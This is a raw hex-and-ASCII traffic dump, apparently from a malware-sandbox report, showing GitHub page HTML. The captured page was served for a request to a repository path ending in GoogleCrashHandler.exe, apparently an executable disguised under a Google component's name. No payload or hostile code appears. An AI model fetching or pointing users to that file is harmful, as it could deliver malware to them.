                                                                                              Data Ascii: 0f078b.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.c
                                                                                              2022-08-10 04:47:09 UTC88INData Raw: 53 68 5a 56 72 62 4e 66 73 55 55 5a 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79
                                                                                              Data Ascii: ShZVrbNfsUUZRp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" ty
                                                                                              2022-08-10 04:47:09 UTC90INData Raw: 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 36 33 64 65 62 65 2d 34 61 32 66 33 37 66 37 34 31 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 49 57 33 4a 73 65 4f 30 6d 30 79 63 6c 69 78 73 78 44 77 75 58 42 6c 41 70 30 2b 62 58 56 5a 6b 41
                                                                                              Data Ascii: vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-4a2f37f7419e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-IW3JseO0m0yclixsxDwuXBlAp0+bXVZkA
                                                                                              2022-08-10 04:47:09 UTC91INData Raw: 4b 42 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 62 33 64 33 32 66 2d 63 32 35 31 39 65 32 30 65 35 62 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20
                                                                                              Data Ascii: KBQ==" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-b3d32f-c2519e20e5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
                                                                                              2022-08-10 04:47:09 UTC92INData Raw: 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 59 6c 5a 7a 66 44 73 30 73 4a 77 62 34 4c 44 50 6f 59 47 7a 70 70 61 61 73 47 2f 79 76 59 38 44 6f 6c 56 6b 36 34 75 37 4b 6a 70 79 7a 2f 4e 70 4b 53 33 45 37 74 6f 42 6b 48 63 44 78 4e 53 42 38 78 37 6d 6c 44 44 6a 43 32 6e 48 75 57 69 6c 74 73 4d 47 76 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67
                                                                                              Data Ascii: ipt><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-YlZzfDs0sJwb4LDPoYGzppaasG/yvY8DolVk64u7Kjpyz/NpKS3E7toBkHcDxNSB8x7mlDDjC2nHuWiltsMGvQ==" src="https://github.githubassets.com/assets/vendors-node_modules_g
                                                                                              2022-08-10 04:47:09 UTC94INData Raw: 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 4d 55 71 6c 6c 55 31 7a 57 53 63 4a 72 47 34 34 75 68 50 69 4b 38 69 72 69 72 30 6e 77 36 53 65 70 47 76 70 2b 72 77 6a 52 51 52 6e 4c 6e 4b 54 6c 49 67 61 43 4f 31 4e 37 4f 45 5a 33 58 53 71 48 49 4a 79 4e 6e 5a 52 31 55 6c 41 32 39 6c 42 5a 72 71 78 53 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74
                                                                                              Data Ascii: ipt><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-MUqllU1zWScJrG44uhPiK8irir0nw6SepGvp+rwjRQRnLnKTlIgaCO1N7OEZ3XSqHIJyNnZR1UlA29lBZrqxSw==" src="https://github.githubassets.com/assets/app_assets_modules_git
                                                                                              2022-08-10 04:47:09 UTC95INData Raw: 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 75 4e 66 37 63 49 5a 6a 6b 30 6f 52 65 31 71 46 6e 7a 56 50 31 65 46 72 6d 68 51 4b 71 36 31 41 51 70 77 4e 66 67 4d 62 6c 46 4b 47 4e 36 56 4e 7a 69 7a 77 6a 32 55 31 64 78 48 78 66 76 77 7a 75 2f 43 6d 2f 71 65 4b 6b 75 32 4d 75 6a 45 2f 61 75 4c 64 36 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f
                                                                                              Data Ascii: ules_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-uNf7cIZjk0oRe1qFnzVP1eFrmhQKq61AQpwNfgMblFKGN6VNzizwj2U1dxHxfvwzu/Cm/qeKku2MujE/auLd6g==" src="https:/
                                                                                              2022-08-10 04:47:09 UTC96INData Raw: 6a 4a 47 4d 7a 4d 34 4e 45 51 69 4c 43 4a 32 61 58 4e 70 64 47 39 79 58 32 6c 6b 49 6a 6f 69 4d 54 4d 34 4f 44 41 30 4d 6a 6b 34 4e 44 41 78 4d 54 41 79 4d 44 4d 32 4e 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 6c 5a 47 64 6c 49 6a 6f 69 5a 6e 4a 68 49 69 77 69 63 6d 56 6e 61 57 39 75 58 33 4a 6c 62 6d 52 6c 63 69 49 36 49 6d 6c 68 5a 43 4a 39 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 68 6d 61 63 22 20 63 6f 6e 74 65 6e 74 3d 22 37 33 66 37 36 63 37 30 35 33 39 36 35 32 65 32 30 31 39 32 64 30 34 35 31 36 64 32 64 31 37 33 65 35 38 32 34 61 61 32 62 33 62 62 33 36 64 32 31 33 66 39 62 66 39 38 39 35 66 64 39 64 31 66 22 20 64 61 74 61 2d 70 6a 61
                                                                                              Data Ascii: jJGMzM4NEQiLCJ2aXNpdG9yX2lkIjoiMTM4ODA0Mjk4NDAxMTAyMDM2NSIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="73f76c70539652e20192d04516d2d173e5824aa2b3bb36d213f9bf9895fd9d1f" data-pja
                                                                                              2022-08-10 04:47:09 UTC98INData Raw: 20 72 65 6c 3d 22 66 6c 75 69 64 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 6c 75 69 64 69 63 6f 6e 2e 70 6e 67 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 34 30 31 34 38 38 36 39 33 34 33 36 35 32 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 31 34 37 37 33 37 36 39 30 35 22 20 2f 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d
                                                                                              Data Ascii: rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta property="og:url" content="https://github.com
                                                                                              2022-08-10 04:47:09 UTC99INData Raw: 31 32 30 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 3a 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 33 33 33 34 37 36 32 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74
                                                                                              Data Ascii: 1200"> <meta property="og:image:height" content="620"> <meta property="twitter:site" content="github"> <meta property="twitter:site:id" content="13334762"> <meta property="twitter:creator" content="github"> <meta property="t
                                                                                              2022-08-10 04:47:09 UTC100INData Raw: 39 62 33 33 35 34 66 37 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 30 32 30 65 35 30 34 30 64 66 64 62 62 33 36 36 30 36 65 62 64 63 65 65 35 62 34 31 32 62 31 39 63 64 37 66 30 39 36 36 39 33 64 65 30 64 31 33 63 66 61 39 36 39 32 39 36 38 36 66 33 65 32 63 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 6a 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 31 39 34 63 64 34 63 34 62 34 63 38 32 36 66 38 65 63 31 35 30 31 37 36 37 31 34
                                                                                              Data Ascii: 9b3354f73" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="020e5040dfdbb36606ebdcee5b412b19cd7f096693de0d13cfa96929686f3e2c" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="194cd4c4b4c826f8ec150176714
                                                                                              2022-08-10 04:47:09 UTC102INData Raw: 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 66 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 65 32 33 32 37 22 3e
                                                                                              Data Ascii: avicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"><meta name="theme-color" content="#1e2327">
                                                                                              2022-08-10 04:47:09 UTC103INData Raw: 2d 39 34 66 64 36 37 2d 34 31 37 32 33 31 61 39 38 35 32 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 43 65 6a 57 4e 31 77 2f 51 6a 62 4f 47 35 45 48 31 66 68 4e 79 50 6b 50 70 67 34 6e 49 6e 6e 70 72 54 41 4c 47 45 61 6f 78 39 45 6c 75 31 62 63 57 32 7a 45 6f 58 2b 66 45 4c 43 5a 41 42 52 65 34 2f 63 6d 76 2b 36 54 6e 61 2f 35 4f 49 70 78 73 58 64 36 2b 41 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d
                                                                                              Data Ascii: -94fd67-417231a98525.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-CejWN1w/QjbOG5EH1fhNyPkPpg4nInnprTALGEaox9Elu1bcW2zEoX+fELCZABRe4/cmv+6Tna/5OIpxsXd6+A==" src="https://github.githubassets.com
                                                                                              2022-08-10 04:47:09 UTC104INData Raw: 2e 37 33 2e 35 34 20 31 2e 34 38 20 30 20 31 2e 30 37 2d 2e 30 31 20 31 2e 39 33 2d 2e 30 31 20 32 2e 32 20 30 20 2e 32 31 2e 31 35 2e 34 36 2e 35 35 2e 33 38 41 38 2e 30 31 33 20 38 2e 30 31 33 20 30 20 30 30 31 36 20 38 63 30 2d 34 2e 34 32 2d 33 2e 35 38 2d 38 2d 38 2d 38 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 6e 6f 6e 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 20 77 69 64 74 68 2d 66 69 74 20 70 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66
                                                                                              Data Ascii: .73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> </a> <div class="d-lg-none css-truncate css-truncate-target width-fit p-2"> </div> <div class="d-flex f
                                                                                              2022-08-10 04:47:09 UTC106INData Raw: 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 74 68 72 65 65 2d 62 61 72 73 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 20 32 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 32 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 32 2e 37 35 7a 6d 30 20 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 37 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 37 2e 37 35 7a 4d 31 2e 37 35 20 31 32 61 2e 37 35 2e 37 35 20
                                                                                              Data Ascii: 24" data-view-component="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75
                                                                                              2022-08-10 04:47:09 UTC107INData Raw: 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 64 65 74 61 69 6c 73 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 65 74 61 69 6c 73 20 64 65 74 61 69 6c 73 2d 6f 76 65 72 6c 61 79 20 64 65 74 61 69 6c 73 2d 72 65 73 65 74 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 3c 73 75 6d 6d 61 72 79 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 73 75 6d 6d 61 72 79 20 48 65 61 64 65 72 4d 65 6e 75 2d
                                                                                              Data Ascii: stify-between flex-items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-
                                                                                              2022-08-10 04:47:09 UTC108INData Raw: 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 4d 6f 62 69 6c 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 4d 6f 62 69 6c 65 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 6d 6f 62 69 6c 65 22 3e 0a 20 20 20 20 20 20 4d 6f 62 69 6c 65 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f
                                                                                              Data Ascii: click to go to Mobile&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Mobile;&quot;}" href="/mobile"> Mobile</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline po
                                                                                              2022-08-10 04:47:09 UTC110INData Raw: 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 70 69 6c 6f 74 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 63 6f 70 69 6c 6f 74 22 3e 0a 20 20 20 20 20 20 43 6f 70 69 6c 6f 74 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26
                                                                                              Data Ascii: leCrashHandler.exe;ref_cta:Copilot;&quot;}" href="/features/copilot"> Copilot</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&
                                                                                              2022-08-10 04:47:09 UTC111INData Raw: 20 43 6f 64 65 20 72 65 76 69 65 77 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75
                                                                                              Data Ascii: Code review</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&qu
                                                                                              2022-08-10 04:47:09 UTC112INData Raw: 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 62 6f 72 64 65 72 2d 74 6f 70 20 70 74 2d 34 20 70 62 2d 32 20 6d 74 2d 33 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 47 69 74 48 75 62 20 53 70 6f 6e 73 6f 72 73 26
                                                                                              Data Ascii: ondensed-ultra d-block no-underline position-relative Link--primary text-bold border-top pt-4 pb-2 mt-3" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to GitHub Sponsors&
                                                                                              2022-08-10 04:47:09 UTC114INData Raw: 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 65 61 6d 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 65 61 6d 22 3e 54 65 61 6d 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 30 20 6d 72 2d 6c 67 2d 33 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 